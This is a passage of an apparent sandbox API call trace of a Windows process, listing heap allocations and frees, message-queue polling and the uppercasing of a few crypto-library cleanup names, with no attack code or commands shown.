0x2e54d48 [0129.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa918) returned 0x2eca7c0 [0129.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0129.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0129.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0129.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0129.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0129.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0129.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0129.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0129.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0129.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0129.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0129.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0129.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa918) returned 0x2ed50e0 [0129.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eca7c0 | out: hHeap=0x970000) returned 1 [0129.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0129.582] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0129.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0129.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0129.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0129.582] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0129.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0129.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0129.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0129.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0129.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0129.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0129.582] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0129.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0129.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0129.582] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0129.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0129.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0129.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0129.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0129.583] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0129.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0129.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0129.583] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0129.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0129.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0129.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0129.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0129.583] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0129.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0129.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0129.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0129.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0129.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0129.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0129.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0129.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0129.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0129.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0129.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0129.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0129.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0129.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0129.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0129.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0129.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0129.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0129.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0129.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0129.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0129.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0129.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0129.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0129.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0129.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0129.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0129.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0129.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0129.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0129.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0129.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0129.584] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0129.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0129.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0129.585] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0129.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0129.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0129.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0129.585] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0129.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0129.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0129.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0129.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0129.585] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0129.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0129.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0129.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0129.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0129.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0129.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0129.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0129.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0129.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0129.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0129.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0129.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0129.585] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0129.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0129.585] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0129.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0129.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0129.586] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0129.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0129.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0129.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0129.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0129.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0129.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0129.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0129.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0129.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0129.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0129.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0129.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa918) returned 0x2eca7c0 [0129.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0129.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0129.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa918) returned 0x2edfa00 [0129.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0129.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0129.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eca7c0 | out: hHeap=0x970000) returned 1 [0129.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0129.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0129.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0129.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0129.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0129.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa918) returned 0x2eca7c0 [0129.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2edfa00 | out: hHeap=0x970000) returned 1 [0129.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0129.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0129.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa918) returned 0x2edfa00 [0129.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eca7c0 | out: hHeap=0x970000) returned 1 [0129.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0129.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0129.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0129.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0129.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0129.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0129.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0129.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0129.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0129.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0129.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0129.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0129.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0129.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0129.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0129.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0129.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0129.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0129.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0129.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0129.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0129.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0129.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0129.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0129.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0129.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0129.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0129.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0129.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0129.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0129.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0129.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0129.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0129.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ebfea0 | out: hHeap=0x970000) returned 1 [0129.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0129.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0129.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0129.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0129.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0129.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0129.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0129.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0129.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0129.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0129.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0129.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0129.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0129.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0129.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0129.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0129.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0129.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eb5580 | out: hHeap=0x970000) returned 1 [0129.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0129.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0129.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0129.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0129.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0129.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ed50e0 | out: hHeap=0x970000) returned 1 [0129.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0129.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0129.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0129.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0129.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0129.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0129.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0129.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0129.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0129.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0129.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0129.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea0340 | out: hHeap=0x970000) returned 1 [0129.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0129.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0129.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0129.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0129.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0129.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0129.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0129.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eaac60 | out: hHeap=0x970000) returned 1 [0129.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0129.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0129.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa918) returned 0x2ea0340 [0129.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2edfa00 | out: hHeap=0x970000) returned 1 [0129.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0129.679] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0129.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0129.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0129.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0129.679] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0129.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0129.679] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0129.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0129.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0129.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0129.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0129.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0129.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0129.679] RtlAllocateHeap 